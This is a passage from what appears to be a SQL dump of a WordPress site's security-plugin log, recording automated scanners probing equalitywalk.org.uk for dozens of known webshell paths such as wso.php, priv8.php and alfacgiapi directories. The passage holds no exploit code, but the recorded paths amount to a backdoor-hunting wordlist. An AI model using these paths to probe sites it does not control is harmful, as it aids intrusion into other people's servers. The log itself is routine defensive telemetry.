G2KFdrN0RCZqpHIw1yUv4Y','','19|0|0|0|www.equalitywalk.org.uk/o.php'),('20.244.36.78',351544398,'',0,1674455260.8522,55,'CUefLqkaB5I8nZ2cpTzxwb4P','','19|0|0|0|www.equalitywalk.org.uk/p.php'),('20.244.36.78',351544398,'',0,1674455261.6908,55,'wQHer47hEo9uULYA6FIcDJ2X','','19|0|0|0|www.equalitywalk.org.uk/q.php'),('20.244.36.78',351544398,'',0,1674455262.4923,55,'EviTsdI2pDFqRSKoxXWzf4wG','','19|0|0|0|www.equalitywalk.org.uk/s.php'),('20.244.36.78',351544398,'',0,1674455263.2659,55,'yJleFK0uZOovm6UXNfIPhq7S','','19|0|0|0|www.equalitywalk.org.uk/d.php'),('20.244.36.78',351544398,'',0,1674455264.1107,55,'5Z2OonjrpbyP19vzQ0tAixaT','','19|0|0|0|www.equalitywalk.org.uk/f.php'),('20.244.36.78',351544398,'',0,1674455264.9240,55,'f8jC3qUcs0w6epQIOmThDya9','','19|0|0|0|www.equalitywalk.org.uk/g.php'),('20.244.36.78',351544398,'',0,1674455265.7352,55,'h5qXSwCFL9UO8raftge3dH7v','','19|0|0|0|www.equalitywalk.org.uk/h.php'),('20.244.36.78',351544398,'',0,1674455266.5483,55,'KGNm2gXzS5y4pDJ7Va9EBvOe','','19|0|0|0|www.equalitywalk.org.uk/j.php'),('20.244.36.78',351544398,'',0,1674455267.3931,55,'IawfyGVDAJCpjelKiZ6u1BqS','','19|0|0|0|www.equalitywalk.org.uk/k.php'),('20.244.36.78',351544398,'',0,1674455268.1988,55,'vEthZaT1ljy7PMCUOSfs9uq0','','19|0|0|0|www.equalitywalk.org.uk/l.php'),('20.244.36.78',351544398,'',0,1674455269.0085,55,'9SdnGDvteIoZ1sg20mKz83ur','','19|0|0|0|www.equalitywalk.org.uk/m.php'),('20.244.36.78',351544398,'',0,1674455269.8321,55,'Cwue74P2i6JSDaEdV51vtU0A','','19|0|0|0|www.equalitywalk.org.uk/w.php'),('20.244.36.78',351544398,'',0,1674455270.6764,55,'tmP5pHyxrJR9bLekFGhaAWI8','','19|0|0|0|www.equalitywalk.org.uk/v.php'),('20.244.36.78',351544398,'',0,1674455271.4652,55,'wz890nNmt5ZGUkTxdPBb46fX','','19|0|0|0|www.equalitywalk.org.uk/n.php'),('20.244.36.78',351544398,'',0,1674455272.2497,55,'wxjHFcU5KAgqnTBSItXG083O','','19|0|0|0|www.equalitywalk.org.uk/b.php'),('20.244.36.78',351544398,'',0,1674455273.0627,55,'NgSD8bvTj4uAH5Wm6IeM9kGl','','19|0|0|0|www.equalitywalk.org.uk/c.php'),('20.244.36.78',351544398,'',0,1674455273.8701,55,'KXzgcDM9feGHYPksU6CV73dm','','19|0|0|0|www.equalitywalk.org.uk/wp-wso.php'),('20.244.36.78',351544398,'',0,1674455274.6766,55,'hE26Qug7kWmf1LSHjPCVb4FY','','19|0|0|0|www.equalitywalk.org.uk/priv8.php'),('20.244.36.78',351544398,'',0,1674455275.5032,55,'m81YhVxpwiIqzD5dKWNjUMrT','','19|0|0|0|www.equalitywalk.org.uk/minimo.php'),('20.244.36.78',351544398,'',0,1674455276.2936,55,'gxSz18yEM0bTvCn4JlR5aOdh','','19|0|0|0|www.equalitywalk.org.uk/V3.php'),('20.244.36.78',351544398,'',0,1674455277.1338,55,'MApmXdPU15WISCVeLaJw4iBH','','19|0|0|0|www.equalitywalk.org.uk/V5.php'),('20.244.36.78',351544398,'',0,1674455277.9967,55,'4ZkdsNSiYtXn6o1jlGLeu0AJ','','19|0|0|0|www.equalitywalk.org.uk/www.php'),('20.244.36.78',351544398,'',0,1674455278.8499,55,'QkjaEcIo35xRenWUPyOFTr14','','19|0|0|0|www.equalitywalk.org.uk/100.php'),('20.244.36.78',351544398,'',0,1674455279.8309,55,'72MdhzDriKI4BH1ZWqnO6QfG','','19|0|0|0|www.equalitywalk.org.uk/777.php'),('20.244.36.78',351544398,'',0,1674455280.6673,55,'eY207G9uoQdMcIJqh64FafrE','','19|0|0|0|www.equalitywalk.org.uk/defau1t.php'),('20.244.36.78',351544398,'',0,1674455281.5022,55,'t3lQPTNBpnqZux0rVzockj8y','','19|0|0|0|www.equalitywalk.org.uk/xox.php'),('20.244.36.78',351544398,'',0,1674455282.2943,55,'mFDnO7u4kEHdKoGLjY1XIzyJ','','19|0|0|0|www.equalitywalk.org.uk/new.php'),('20.244.36.78',351544398,'',0,1674455283.0845,55,'hlfPbiok7ayxSt2eDYI95r6W','','19|0|0|0|www.equalitywalk.org.uk/wi.php'),('20.244.36.78',351544398,'',0,1674455283.8891,55,'6MS0lqnI1ez7rmgoCNcsjA25','','19|0|0|0|www.equalitywalk.org.uk/mar.php'),('20.244.36.78',351544398,'',0,1674455284.7543,55,'8mqyabKHweNVjCRn30rd4tgB','','19|0|0|0|www.equalitywalk.org.uk/root.php'),('20.244.36.78',351544398,'',0,1674455285.5620,55,'l9BiO1ZWfTQHYVDcA6kUKReN','','19|0|0|0|www.equalitywalk.org.uk/nee.php'),('20.244.36.78',351544398,'',0,1674455286.3779,55,'oUmt1TLQMby2wPD4pFY9EK0O','','19|0|0|0|www.equalitywalk.org.uk/ws.php'),('20.244.36.78',351544398,'',0,1674455287.1502,55,'WVkHuGQUa92PsErJX3wicBnl','','19|0|0|0|www.equalitywalk.org.uk/lol.php'),('20.244.36.78',351544398,'',0,1674455287.9883,55,'DV5LR6tGBxks4OAbl7druXpc','','19|0|0|0|www.equalitywalk.org.uk/87.php'),('20.244.36.78',351544398,'',0,1674455288.8959,55,'vaJuRCI8yDHLAho71iXjqWd4','','19|0|0|0|www.equalitywalk.org.uk/7yn.php'),('20.244.36.78',351544398,'',0,1674455289.7108,55,'R0V95lzrJFws6S8QnY7M4iqy','','19|0|0|0|www.equalitywalk.org.uk/haxor.php'),('20.244.36.78',351544398,'',0,1674455290.5115,55,'WOTPfyjuixIAqDL5t4YbneGo','','19|0|0|0|www.equalitywalk.org.uk/13.php'),('20.244.36.78',351544398,'',0,1674455291.3183,55,'gKQeVIa1C2FvEmLyPrzf9Ylq','','19|0|0|0|www.equalitywalk.org.uk/FoxWSOv1.php'),('20.244.36.78',351544398,'',0,1674455292.1235,55,'J6TFXNktS3sHU9RMwWAQ4Oqr','','19|0|0|0|www.equalitywalk.org.uk/alf.php'),('20.244.36.78',351544398,'',0,1674455292.9121,55,'LIKaDWQZv6P5TOqA7NfM8tU1','','19|0|0|0|www.equalitywalk.org.uk/bb.php'),('20.244.36.78',351544398,'',0,1674455293.7715,55,'zCA3rLQUgm8YOKVW4MvqRDh2','','19|0|0|0|www.equalitywalk.org.uk/lf.php'),('20.244.36.78',351544398,'',0,1674455294.5721,55,'wcrZpX7foj6GvmQCqSEDu8PN','','19|0|0|0|www.equalitywalk.org.uk/WSO.php'),('20.244.36.78',351544398,'',0,1674455295.3598,55,'4U9xL8vfZeCqN3cRMJ7DpFYb','','19|0|0|0|www.equalitywalk.org.uk/hello.php'),('20.244.36.78',351544398,'',0,1674455296.1527,55,'qKVmc2RMvzHSbNdTEu1G6IXY','','19|0|0|0|www.equalitywalk.org.uk/if.php'),('20.244.36.78',351544398,'',0,1674455296.9877,55,'iMQDYc5W8k0JpUq9P6KeTjVx','','19|0|0|0|www.equalitywalk.org.uk/kk.php'),('20.244.36.78',351544398,'',0,1674455297.8003,55,'soLPmcbZiuSlxG9yrEVzIWq2','','19|0|0|0|www.equalitywalk.org.uk/mrjn.php'),('20.244.36.78',351544398,'',0,1674455298.6079,55,'m1XVe6M9cPyjL0FUvOKstwiB','','19|0|0|0|www.equalitywalk.org.uk/kn.php'),('20.244.36.78',351544398,'',0,1674455299.4645,55,'nMOe0cWqLGJBu9mHzbkd5sKw','','19|0|0|0|www.equalitywalk.org.uk/3301.php'),('20.244.36.78',351544398,'',0,1674455300.2782,55,'FQXaN0JfUyMnuImovOdjYZ9w','','19|0|0|0|www.equalitywalk.org.uk/leaf.php'),('20.244.36.78',351544398,'',0,1674455301.0792,55,'dDS0UIhlYLGpVXOT63KHz5xe','','19|0|0|0|www.equalitywalk.org.uk/alex.php'),('20.244.36.78',351544398,'',0,1674455301.8739,55,'kwW4XOSZshKE0JPoymdbjG3A','','19|0|0|0|www.equalitywalk.org.uk/mailer.php'),('20.244.36.78',351544398,'',0,1674455302.6995,55,'7WwL4sHM8ej3vuATJydOiPfZ','','19|0|0|0|www.equalitywalk.org.uk/anone.php'),('20.244.36.78',351544398,'',0,1674455303.5343,55,'5LKm3P9lCVTDHg7UpawkyM2N','','19|0|0|0|www.equalitywalk.org.uk/wp-configer.php'),('20.244.36.78',351544398,'',0,1674455304.4018,55,'DGPTaCJ9L8BMjtqKVs5pN20b','','19|0|0|0|www.equalitywalk.org.uk/wp-ad.php'),('20.244.36.78',351544398,'',0,1674455305.2261,55,'MR46uH2b7EVpCqYivoIyUG1W','','19|0|0|0|www.equalitywalk.org.uk/send.php'),('20.244.36.78',351544398,'',0,1674455306.0371,55,'GlDPd9KFStgbOnBVaXkMUQv0','','19|0|0|0|www.equalitywalk.org.uk/.wp-cache.php'),('20.244.36.78',351544398,'',0,1674455306.8439,55,'lcWFUafeIy7S5g6CM89JdNEr','','19|0|0|0|www.equalitywalk.org.uk/sendmail.php'),('20.244.36.78',351544398,'',0,1674455307.6459,55,'Y7RL6hdeCSBy5Vvw2mxiPZJ9','','19|0|0|0|www.equalitywalk.org.uk/rahma.php'),('20.244.36.78',351544398,'',0,1674455308.4650,55,'t19H3GZJpTnYgo2XDOihweW8','','19|0|0|0|www.equalitywalk.org.uk/nasgor.php'),('20.244.36.78',351544398,'',0,1674455309.2953,55,'SYqEs705BjVr81DZJbKOMWxA','','19|0|0|0|www.equalitywalk.org.uk/wp-confirm.php'),('20.244.36.78',351544398,'',0,1674455310.0851,55,'QpEPFxvDfUjLhM6SwRz78bYi','','19|0|0|0|www.equalitywalk.org.uk/alfa123.php'),('20.244.36.78',351544398,'',0,1674455310.8732,55,'h9Tez4tWc7wHSXLmQVJP6qMr','','19|0|0|0|www.equalitywalk.org.uk/upload.php'),('20.244.36.78',351544398,'',0,1674455311.6755,55,'DTlY6uOWJhv5Z2fqQpKAozt4','','19|0|0|0|www.equalitywalk.org.uk/bypass.php'),('20.244.36.78',351544398,'',0,1674455312.5316,55,'cBZ23i0FUkoy7rz9T1YwEGPD','','19|0|0|0|www.equalitywalk.org.uk/wp-one.php'),('20.244.36.78',351544398,'',0,1674455313.3369,55,'8KTMx7XWdjQolpGby5kgr3zZ','','19|0|0|0|www.equalitywalk.org.uk/alexus.php'),('20.244.36.78',351544398,'',0,1674455314.1470,55,'VWDCeGSUnKwl35uXNafmEFO1','','19|0|0|0|www.equalitywalk.org.uk/wso1337.php'),('20.245.185.110',351648110,'',0,1674459536.0750,55,'hDLS3IAkyaUm096czZp1fOiM','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/css/css.php'),('20.245.185.110',351648110,'',0,1674459540.0148,55,'7cp5YEjDes13XqIvCxJutHfb','','19|0|0|0|www.equalitywalk.org.uk/wp-commentin.php'),('20.245.185.110',351648110,'',0,1674459543.3009,55,'5AHdTo02ZKLfq4Cxw1FWzpNS','','19|0|0|0|www.equalitywalk.org.uk/wp/wp-commentin.php'),('20.245.185.110',351648110,'',0,1674459546.2228,55,'Szew2KviR76jPVD4c05F3pGM','','19|0|0|0|www.equalitywalk.org.uk/wordpress/wp-commentin.php'),('20.245.185.110',351648110,'',0,1674459559.3717,55,'7pSd5IWmK1xwTr3XYMFhjf4D','','19|0|0|0|www.equalitywalk.org.uk/blog/wp-commentin.php'),('20.245.185.110',351648110,'',0,1674459559.3802,10,'7pSd5IWmK1xwTr3XYMFhjf4D','','707|0|0|0|www.equalitywalk.org.uk/blog/wp-commentin.php'),('20.245.185.110',351648110,'',0,1674459573.7118,100,'m2Fq64hp0oTBCL1ljYOaUxVe','','13|0|0|0|www.equalitywalk.org.uk/site/wp-commentin.php'),('35.183.107.9',599223049,'',0,1674462099.0294,55,'8WGXFmPCinOt371ckyxrofgs','','19|0|0|0|www.equalitywalk.org.uk/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462099.3645,55,'IbHYRopPJ56BTQZdGmEt4rXu','','19|0|0|0|www.equalitywalk.org.uk/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462099.6400,55,'v6DHShajPeqUwRXMz5rmo1IY','','19|0|0|0|www.equalitywalk.org.uk/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462101.8708,55,'odt9FamSV3sAL6yJeDBUThjb','','19|0|0|0|www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462102.1612,55,'PCYAfgT8RDcbFmqsw5NhadKX','','19|0|0|0|www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462102.1936,10,'PCYAfgT8RDcbFmqsw5NhadKX','','707|0|0|0|www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462102.4527,100,'f51taX3F2IeQVuq9AUTcSRs6','','13|0|0|0|www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462104.8771,100,'lUTzkHXBY7MRJurNoAI4V6aK','','13|0|0|0|www.equalitywalk.org.uk/assets/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462105.1529,100,'9gq12VStjJPQbyB3wE6hAmx4','','13|0|0|0|www.equalitywalk.org.uk/assets/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462105.4276,100,'zWO7Er6A8x1vg3dchokqpSIR','','13|0|0|0|www.equalitywalk.org.uk/assets/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462108.5736,100,'a2dE7W8hlfFJD9xmqecRAY0z','','13|0|0|0|www.equalitywalk.org.uk/assets/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462108.8812,100,'ORxyYpvZWMmTdLNFVjhABb92','','13|0|0|0|www.equalitywalk.org.uk/assets/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462109.2205,100,'yJYoLDRuEe6QfKcONgIjrGUZ','','13|0|0|0|www.equalitywalk.org.uk/assets/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462111.9129,100,'X2D8uBFy7wZ4EjMHIxreoizd','','13|0|0|0|www.equalitywalk.org.uk/upload/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462112.2495,100,'7ILO8YkwygtUav6A41Ff3hSq','','13|0|0|0|www.equalitywalk.org.uk/upload/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462112.5579,100,'lQMmASZhn7N05HrLEuxq8og2','','13|0|0|0|www.equalitywalk.org.uk/upload/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462117.5203,100,'8DpEWsPMbJOrGmQlYq3uTXk9','','13|0|0|0|www.equalitywalk.org.uk/upload/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462117.8091,100,'0M3Kh2dnLcOtJ8VRufjYPFwX','','13|0|0|0|www.equalitywalk.org.uk/upload/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462118.1645,100,'qNhyF9M5JnOYtC0XwLGsQBDT','','13|0|0|0|www.equalitywalk.org.uk/upload/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462121.6813,100,'ZdxhvXu4B3mQnPlraL5Ee0Kt','','13|0|0|0|www.equalitywalk.org.uk/uploads/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462122.0381,100,'YMEaJAHCmOptzI0RZ3Bdjwc4','','13|0|0|0|www.equalitywalk.org.uk/uploads/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462122.3556,100,'2IW5cMSnd3jZlabLHuqvz8BJ','','13|0|0|0|www.equalitywalk.org.uk/uploads/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462127.2624,100,'rgGij6JCtYF4RVI8DWyTZX7l','','13|0|0|0|www.equalitywalk.org.uk/uploads/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462128.6349,100,'UQJuqanFgw5Iyv8H6ZWNCjbh','','13|0|0|0|www.equalitywalk.org.uk/uploads/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462128.9201,100,'j5bk3QSzvwTZA0rifmyNp6KG','','13|0|0|0|www.equalitywalk.org.uk/uploads/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462133.8934,100,'Ey5jDA2OR1rQb6cNTw3a7ue4','','13|0|0|0|www.equalitywalk.org.uk/assets/upload/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462134.5904,100,'thAFjq1ymgw6Hs3xkReWiaXd','','13|0|0|0|www.equalitywalk.org.uk/assets/upload/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462134.9156,100,'RrwWevM9u8BU2OH1n64fpgPi','','13|0|0|0|www.equalitywalk.org.uk/assets/upload/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462137.3549,100,'itImyAP7Tsk1MLvjowOlKpux','','13|0|0|0|www.equalitywalk.org.uk/assets/upload/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462137.8014,100,'j5P1gsbTAO6cQ047mHBRuaEX','','13|0|0|0|www.equalitywalk.org.uk/assets/upload/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462138.0652,100,'RLF1TIsHiO2q5WmhDPjuGx9X','','13|0|0|0|www.equalitywalk.org.uk/assets/upload/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462142.0369,100,'XMb3ntql2VaO7d6rS4sfAmG1','','13|0|0|0|www.equalitywalk.org.uk/assets/uploads/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462142.3646,100,'WmNRzj0nSb9Ku4Ycy1GktEVf','','13|0|0|0|www.equalitywalk.org.uk/assets/uploads/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462142.6813,100,'ajP8TW4bKZRvfFyuMrV6zCN9','','13|0|0|0|www.equalitywalk.org.uk/assets/uploads/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462147.3226,100,'PxOcysUng4bu85W0T26oiJLC','','13|0|0|0|www.equalitywalk.org.uk/assets/uploads/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462147.6586,100,'Ahnv783pXo50EPuDwfLqIegZ','','13|0|0|0|www.equalitywalk.org.uk/assets/uploads/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462147.9584,100,'4oqIL5ukimBK1ytdHJR3PgF8','','13|0|0|0|www.equalitywalk.org.uk/assets/uploads/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462199.8680,100,'aOZpWdNJeU94TIgwfot0GR57','','13|0|0|0|www.equalitywalk.org.uk/wp-admin/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462200.1891,100,'pIogsnxVFWhbS024uwHcaM3G','','13|0|0|0|www.equalitywalk.org.uk/wp-admin/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462200.5616,100,'nelG95gkUXjSONKwcCxbHpiI','','13|0|0|0|www.equalitywalk.org.uk/wp-admin/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462203.7316,100,'0ULnGPzsuSXBcQqdANVvOo1J','','13|0|0|0|www.equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462204.0968,100,'LP14gyJbsk2zSAGchUZMvwOW','','13|0|0|0|www.equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462204.4088,100,'g6MVA1pODf8aZdK5wN9EGCIi','','13|0|0|0|www.equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462208.6727,100,'T1jEPnadiLoCMyH4RFkKSBhw','','13|0|0|0|www.equalitywalk.org.uk/wp-includes/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462209.0065,100,'PGWi0deomDFKYQb3laE4ZwJA','','13|0|0|0|www.equalitywalk.org.uk/wp-includes/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462209.3840,100,'yrqNSwMczQvoX6HDfUkGlVi4','','13|0|0|0|www.equalitywalk.org.uk/wp-includes/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462212.4889,100,'Rmu7NSBVZ4qyb5fascUClLWK','','13|0|0|0|www.equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462212.8403,100,'lG8CzU2ndygLqiXOQW6bjVae','','13|0|0|0|www.equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462213.2320,100,'LT3CjohZNB1igQ9xX60OJUAF','','13|0|0|0|www.equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462216.9399,100,'TfCiyJwc3veGEKaFPROrN95W','','13|0|0|0|www.equalitywalk.org.uk/.well-known/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462217.3331,100,'GiIbSvHLMXCJ0aK6xh3Zm4Pf','','13|0|0|0|www.equalitywalk.org.uk/.well-known/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462217.6247,100,'kljFc7dGhOPY6DUutHpZiB2A','','13|0|0|0|www.equalitywalk.org.uk/.well-known/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462222.7939,100,'6MmiqT0g7V8ySY513H9BoWGN','','13|0|0|0|www.equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462223.0869,100,'DUE9Tnovk86ywGgMSRau0jit','','13|0|0|0|www.equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462223.3662,100,'0w5aSFCPrX7ueq3v9BoImzdW','','13|0|0|0|www.equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462229.2462,100,'y3ogz4RpOdb9B1CrmvZhL257','','13|0|0|0|www.equalitywalk.org.uk/.well-known/acme-challenge/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462229.6468,100,'FWiJ4Oh1aSvl7XQnHpsjtLUg','','13|0|0|0|www.equalitywalk.org.uk/.well-known/acme-challenge/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462229.9751,100,'5UVHmXqnKevQR3WDN69zfYAC','','13|0|0|0|www.equalitywalk.org.uk/.well-known/acme-challenge/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462238.3315,100,'d7RluPafm0VKpyeLTZ6EY8G4','','13|0|0|0|www.equalitywalk.org.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462238.6820,100,'iKTgmqYzJ9WtZ2Q7dBuF0IaL','','13|0|0|0|www.equalitywalk.org.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462239.0011,100,'4NlzUDWxjncRb9C6HVqw1mQs','','13|0|0|0|www.equalitywalk.org.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462243.9636,100,'x0WHIYSldMFQftL82i6vkXjb','','13|0|0|0|www.equalitywalk.org.uk/.well-known/pki-validation/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462244.3879,100,'DMro1OwZLAd3TIaeBkRvX0Yh','','13|0|0|0|www.equalitywalk.org.uk/.well-known/pki-validation/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462244.7520,100,'VGnQE2f5bpuwilNzvDm0x4M9','','13|0|0|0|www.equalitywalk.org.uk/.well-known/pki-validation/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462248.6209,100,'pbFirYNyL14BEsSnAHcwdG6J','','13|0|0|0|www.equalitywalk.org.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462249.0318,100,'zmWEUkxRIeCoBG2Pa4XwKD03','','13|0|0|0|www.equalitywalk.org.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462249.3702,100,'7kWzyUXGwKSfhTRNIm9LAJ3j','','13|0|0|0|www.equalitywalk.org.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462254.0690,100,'oVtLv1O4pbQyqP3ZMkI7wKYg','','13|0|0|0|www.equalitywalk.org.uk/.tmb/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462254.3838,100,'9rb0kFfLe68whKIOxDNRPjmV','','13|0|0|0|www.equalitywalk.org.uk/.tmb/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462254.7159,100,'xsnQE3PfCwDtlNikYbST4zAv','','13|0|0|0|www.equalitywalk.org.uk/.tmb/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462258.4381,100,'Jw7kocy5MKWBTxqpLHgE2tzU','','13|0|0|0|www.equalitywalk.org.uk/.tmb/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462258.7964,100,'FSXtVu2lp6njbqrKkfeLaYJx','','13|0|0|0|www.equalitywalk.org.uk/.tmb/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462259.1013,100,'SZ0Q9z4JWlxK1XMeYETypdvN','','13|0|0|0|www.equalitywalk.org.uk/.tmb/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462261.8298,100,'t10xMRD9mwYkyFdTHKJzquCn','','13|0|0|0|www.equalitywalk.org.uk/.quarantine/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462262.1239,100,'w7N2qdGZxyte3BSmXb8vV5IQ','','13|0|0|0|www.equalitywalk.org.uk/.quarantine/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462262.4507,100,'wkFfVcivlZJX9KNUzesPO6j5','','13|0|0|0|www.equalitywalk.org.uk/.quarantine/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462266.9023,100,'goIYOTQwakPxKjGMJdr8WS2H','','13|0|0|0|www.equalitywalk.org.uk/.quarantine/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462267.2288,100,'y1f0DwRuY63OMCJIHlBj79A4','','13|0|0|0|www.equalitywalk.org.uk/.quarantine/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462267.5397,100,'MGKqy6NHvEz089POCUXdDojB','','13|0|0|0|www.equalitywalk.org.uk/.quarantine/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462270.8923,100,'NdsREUpqvrc3itG8fBPKOMYm','','13|0|0|0|www.equalitywalk.org.uk/cgi-bin/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462271.2577,100,'Y9MNFckPv4s0ARr5tyEdqLmV','','13|0|0|0|www.equalitywalk.org.uk/cgi-bin/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462271.6733,100,'spjozqLCM8emg60InAhk19Xa','','13|0|0|0|www.equalitywalk.org.uk/cgi-bin/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462277.3795,100,'19VaKA2SubkqDW6ezgiQFvTw','','13|0|0|0|www.equalitywalk.org.uk/cgi-bin/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462277.7329,100,'hma2qtKfBZbej37IOdGR0TPv','','13|0|0|0|www.equalitywalk.org.uk/cgi-bin/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462278.0679,100,'UlAqLf1thpePGn05SruK8ZsV','','13|0|0|0|www.equalitywalk.org.uk/cgi-bin/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462282.9311,100,'twhsjm5Qckoiv3xLyVbJMfng','','13|0|0|0|www.equalitywalk.org.uk/images/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462283.3120,100,'YbpZXfVruhm9l3TNS8KHeRio','','13|0|0|0|www.equalitywalk.org.uk/images/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462283.6116,100,'smhpEXwKzAqJHPnC0NakTybx','','13|0|0|0|www.equalitywalk.org.uk/images/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462286.6598,100,'iMH0dypFSAxBuPKYtz63GWDC','','13|0|0|0|www.equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/index.php'),('35.183.107.9',599223049,'',0,1674462287.0021,100,'pwSqO3rx0RA7IzJWHZhcdsVv','','13|0|0|0|www.equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/radio.php'),('35.183.107.9',599223049,'',0,1674462287.3833,100,'SfLx0Ktp5uI6ewsmAURDP3YF','','13|0|0|0|www.equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/404.php'),('35.183.107.9',599223049,'',0,1674462292.7147,100,'sVmAH9pbTY06M57gw13rneBu','',